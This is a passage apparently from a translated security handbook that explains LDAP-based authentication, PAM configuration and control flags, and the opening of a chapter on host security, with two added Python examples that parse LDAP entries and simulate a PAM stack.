LDAP is a powerful and flexible replacement for NIS and NIS+. Beyond authentication data, the main advantages of LDAP are its ability to store and serve data other than authentication-related data, and the availability of TLS-secured communication. The main drawback of LDAP is that updating its database is far more complex than updating an NIS server, but a variety of tools have been developed to simplify LDAP administration.
182 Schema
183 Object Classes
184 End-to-End Encryption
Authentication with LDAP
RFC 2307 describes a way of using LDAP as a network information system. Although this RFC does not specify an Internet standard, its mechanisms are widely used, and a schema that implements it (nis.schema) is included with OpenLDAP 2.x. This schema defines object classes that represent users (posixAccount and shadowAccount), groups (posixGroup), services (ipService), protocols (ipProtocol), remote procedure calls (oncRpc), hosts (ipHost), networks (ipNetwork), NIS netgroups (nisNetgroup, nisMap, nisObject), and more.
Every service that authenticates users must be rewritten to interact with LDAP; this is similar to the "Kerberizing" process that was needed to work with Kerberos. This approach is simple for operating systems such as Microsoft Windows, which require all authentication to go through an application programming interface[185] published by the vendor, although a very small part of the client software still has to be rewritten.
This approach is not very practical for Unix-based operating systems. Instead, two alternative approaches have been developed; they are published as open-source software by PADL Software and are included in most Linux distributions. The first is nss_ldap, which modifies the C library functions used to obtain user information (such as getpwent()) so that they transparently use an LDAP database instead of local files, NIS, and so on. Many systems already allowed these functions to draw on different sources of information by means of a name service switch[186] file (usually /etc/nsswitch.conf).[187]
The second approach, which uses the PAM framework, is discussed in the next section. LDAP authentication is implemented as a PAM module, pam_ldap. Unlike libnss_ldap, pam_ldap provides only user authentication against the LDAP database and does not publish any other information from the database. If your LDAP server uses the standard nis.schema, adding LDAP authentication to a PAM-controlled service is as simple as adding a line to its PAM configuration file that specifies pam_ldap.so as "sufficient" for authentication, account validation, and password changes.
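How the posixAccount attributes named above line up with the fields a getpwent()-style lookup returns, as an added example (not nss_ldap's code and not from the handbook). The sample entry is constructed, the required-attribute list is taken from RFC 2307, attribute names are matched case-sensitively, and base64 (`::`) values are not handled.

```python
"""Map an RFC 2307 posixAccount entry to a passwd(5)-style record."""

# Attributes a posixAccount entry MUST carry according to RFC 2307.
POSIX_ACCOUNT_MUST = ("cn", "uid", "uidNumber", "gidNumber", "homeDirectory")

# Constructed sample entry; the DN, names and numbers are made up.
SAMPLE_LDIF = """\
dn: uid=jdoe,ou=People,dc=example,dc=com
objectClass: account
objectClass: posixAccount
cn: Jane Doe
uid: jdoe
uidNumber: 1001
gidNumber: 100
homeDirectory: /home/jdoe
loginShell: /bin/sh
"""


def parse_ldif_entry(text):
    """Parse one LDIF entry into {attribute: [values]}.

    Handles plain 'attr: value' lines and continuation lines that start
    with a single space.
    """
    entry, last = {}, None
    for raw in text.splitlines():
        if raw.startswith(" ") and last:
            entry[last][-1] += raw[1:]
            continue
        if not raw.strip() or raw.startswith("#"):
            continue
        attr, _, value = raw.partition(":")
        last = attr.strip()
        entry.setdefault(last, []).append(value.strip())
    return entry


def to_passwd_line(entry):
    """Build a passwd-style record from a posixAccount entry, or raise ValueError."""
    classes = {c.lower() for c in entry.get("objectClass", [])}
    if "posixaccount" not in classes:
        raise ValueError("entry is not a posixAccount")
    missing = [a for a in POSIX_ACCOUNT_MUST if a not in entry]
    if missing:
        raise ValueError("missing required attributes: " + ", ".join(missing))
    # int() rejects non-numeric IDs supplied by the directory.
    uid_number = int(entry["uidNumber"][0])
    gid_number = int(entry["gidNumber"][0])
    fields = [entry["uid"][0], "x", str(uid_number), str(gid_number),
              entry["cn"][0], entry["homeDirectory"][0],
              entry.get("loginShell", [""])[0]]
    # Directory data must not be able to inject extra passwd fields.
    if any(":" in f or "\n" in f for f in fields):
        raise ValueError("field contains a passwd separator")
    return ":".join(fields)


if __name__ == "__main__":
    print(to_passwd_line(parse_ldif_entry(SAMPLE_LDIF)))
```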
Pluggable Authentication Modules
Because there are so many ways to authenticate users, it is better to have a single, uniform way of authenticating that can accommodate several authentication systems for different needs. The Pluggable Authentication Modules (PAM)[188] system is such a method. PAM was originally developed by Sun, and its implementations for Solaris, FreeBSD, and especially Linux are the most widely used. PAM provides a library and an application programming interface that any application can use instead of its own authentication system. Each authentication system that PAM knows about is implemented as a PAM module, in practice as a dynamically loaded shared library. PAM modules are available to authenticate users by the following means:
• the /etc/passwd or /etc/shadow files;
• NIS or NIS+;
• LDAP;
• Kerberos 4 or Kerberos 5; and
• an arbitrary Berkeley database file.
185 Application Programming Interface (API)
186 Name Service Switch
187 For more details on configuring authentication with libnss-ldap, see pages 450 to 453 of the PUIS book.
188 Pluggable Authentication Modules
Each PAM-aware service[189] is configured either in the /etc/pam.conf file or, more commonly, in its own file in the /etc/pam.d directory. For example, the PAM configuration file for the ssh server on Linux is /etc/pam.d/sshd. A service named "other" is used to supply defaults for PAM-aware services that have not been explicitly configured. Below is an example of a PAM configuration file for sshd on a Linux server:
auth required /lib/security/pam_env.so
auth sufficient /lib/security/pam_unix.so
auth required /lib/security/pam_deny.so
account required /lib/security/pam_unix.so
password required /lib/security/pam_cracklib.so retry=3
password sufficient /lib/security/pam_unix.so nullok use_authtok md5 shadow
password required /lib/security/pam_deny.so
session required /lib/security/pam_limits.so
session required /lib/security/pam_unix.so
The "auth" lines define the authentication process for this service, which is followed in the order given. Modules marked "required" must run successfully; if they fail, the user is treated as unauthenticated and access is denied. Several "required" modules can be specified, in which case all of them must run successfully. Modules marked "sufficient", if they run successfully, are enough to authenticate the user and end the authentication process.
In this example, the first module to run is pam_env, which optionally sets or clears environment variables as specified in /etc/security/pam_env.conf. This module is "required": it must run successfully for authentication to go ahead. The next module to run is pam_unix, which performs authentication against the Unix password files, /etc/passwd and /etc/shadow. If it succeeds, that is sufficient to authenticate the user and the process is complete. The last authentication module is pam_deny, which simply fails, so that the authentication process ends unsuccessfully.
This particular configuration file also enforces all of the system's rules on the aging or expiration of user accounts, and places limits on resources in the user's sshd session. If sshd also has a password-changing capability, this configuration file prevents the user from changing the password to one that is easily guessed, and stores passwords in /etc/shadow encrypted with the MD5 cryptographic function.
The PAM subsystem can be configured in several different ways. For example, some user accounts can be required to supply two or three separate passwords,[190] a biometric method can be combined with a passphrase, or different mechanisms can be applied depending on the time of day. On the other hand, in physically very secure locations the password can even be dispensed with. PAM gives the administrator the ability to choose the desired policy so as to best match the risk to the available technology.
189 If these layers are not enough for you, some applications, such as SMTP authentication in Sendmail or mailbox access management by the Cyrus imapd server, use the Cyrus SASL (simple authentication and security layer) authentication library, which can authenticate users against a separate database or through PAM! It is not inconceivable that you would want to use SASL over PAM over LDAP to authenticate a user's imap connection.
PAM, as the examples above make clear, can do much more than simply authenticate. One of its strengths is that it cleanly separates four phases of the access process: determining whether the account is permitted to use the requested service, at the requested time, and from the requested location (the account phase); authenticating the user (the authentication phase); updating passwords and other authentication tokens when that is necessary (the password phase); and setting up and tearing down the user's session (the session phase), which can include limiting access to resources and creating audit trails.
190 This is debatable when a single user holds all of the passwords. The approach can be useful when the passwords are assigned to different users, so that every login requires two or more people and creates a "witness" trail.
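The "required" and "sufficient" behaviour described for the sshd file, and the pam_ldap line mentioned in the LDAP section, can be checked with a small simulator. This is an added example, not code from the handbook or from Linux-PAM: it models only the success or failure of each module under the required, requisite and sufficient flags (requisite is not on the page), and the pam_ldap stack is a constructed variant.

```python
"""Simplified model of how a PAM 'auth' stack is evaluated."""

# The auth lines of the sshd file shown on the page.
SSHD_AUTH = """\
auth required   /lib/security/pam_env.so
auth sufficient /lib/security/pam_unix.so
auth required   /lib/security/pam_deny.so
"""

# Constructed variant (assumption, not the page's listing): pam_ldap.so
# added as "sufficient" ahead of pam_unix.so.
SSHD_AUTH_LDAP = """\
auth required   /lib/security/pam_env.so
auth sufficient /lib/security/pam_ldap.so
auth sufficient /lib/security/pam_unix.so
auth required   /lib/security/pam_deny.so
"""


def parse_stack(text, mgmt_type="auth"):
    """Return [(control, module_name)] for one management type, in file order."""
    stack = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        kind, control, path = line.split()[:3]
        if kind == mgmt_type:
            name = path.rsplit("/", 1)[-1]
            stack.append((control, name[:-3] if name.endswith(".so") else name))
    return stack


def evaluate(stack, results):
    """Simulate the stack; `results` maps module name -> True if it succeeds.

    Returns (granted, modules_run). pam_deny always fails.
    """
    failed_required = False
    any_success = False
    ran = []
    for control, module in stack:
        ok = module != "pam_deny" and results.get(module, False)
        ran.append(module)
        any_success = any_success or ok
        if control == "required":
            # The failure is remembered, but later modules still run.
            failed_required = failed_required or not ok
        elif control == "requisite":
            if not ok:
                return False, ran      # fail at once
        elif control == "sufficient":
            if ok and not failed_required:
                return True, ran       # success ends the stack early
            # a failed "sufficient" module is ignored
        else:
            raise ValueError("control flag not modelled: " + control)
    return (any_success and not failed_required), ran


if __name__ == "__main__":
    stack = parse_stack(SSHD_AUTH)
    for outcome in ({"pam_env": True, "pam_unix": True},
                    {"pam_env": True, "pam_unix": False},
                    {"pam_env": False, "pam_unix": True}):
        print(outcome, "->", evaluate(stack, outcome))
```

The third case is the one the prose does not spell out: once a "required" module has failed, a later "sufficient" success no longer grants access.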
Chapter Six
Server Security
Overview
A server, in the general sense, is a computer that hosts various server programs, which run on it. In this chapter we discuss some of the most common security problems that arise when computers are used as servers of information services, and we describe how to deploy and configure servers so as to minimize these problems. The chapter first examines host security[191] and then the security considerations for the applications used as mail servers, file servers, web servers, database servers, and name servers.
Host Security
Many organizations that have their own servers on the Internet do not secure those servers against external attacks. Users still choose passwords that are easily guessed, and many passwords are easily detected and stolen by Internet packet sniffer software.[192]
Today there are thousands of organized and semi-organized groups of attackers who exchange information about computer vulnerabilities and the ways of exploiting them; techniques, and in many cases complete programs, for penetrating the security layers of systems are widely distributed by e-mail, newsgroups, web pages, and Internet Relay Chat (IRC),[193] and anti-security tools (password sniffers,[194] denial-of-service exploit files, and Trojan horses) are also publicly available.
The Honey Pot Project[195] (http://project.honypot.org/) is an open Internet research project that aims to measure the extent of the intruder community by placing vulnerable computers on the Internet and observing how quickly they are attacked. The project's results are not at all encouraging. For example, it was announced in June 2001 that, according to the project's findings, a Red Hat 6.2 system is, on average, compromised by an attacker using a known exploit only 72 hours after it is connected to the Internet. A typical Internet-connected system is scanned by attackers many times a day. Computers that run the Windows 98 operating system with file sharing enabled (one of the default settings for most home users) are scanned on the Internet on average once an hour and are usually penetrated on the very first day. In one case, a server was penetrated after being connected to the Internet for only 15 minutes!
At present, attackers use automated tools to search for vulnerable computers, and in some cases break into those computers automatically, plant back doors in them, and also hide the damage done. High-speed Internet connections have made it possible for attackers to scan millions of computers for security vulnerabilities in a short period of time.
191 Host Security
192 Packet Sniffer Software
193 Internet Relay Chat
194 Password Sniffers
195 Honey Pot
It is wishful thinking to imagine that host security can be achieved by following a list of "dos" and "don'ts" for networks and computers. It might be argued that, in any case, an attacker has to gain access to a computer in order to damage it, and so in theory all you need to do to secure a system is block every avenue by which an attacker can reach it, and the system will then be secure. In practice, however, experience has shown that it is almost impossible to have a computer that provides services on a network while every avenue of attacker access to it is blocked, because attackers' access
‫ﻻ ﺍﺯ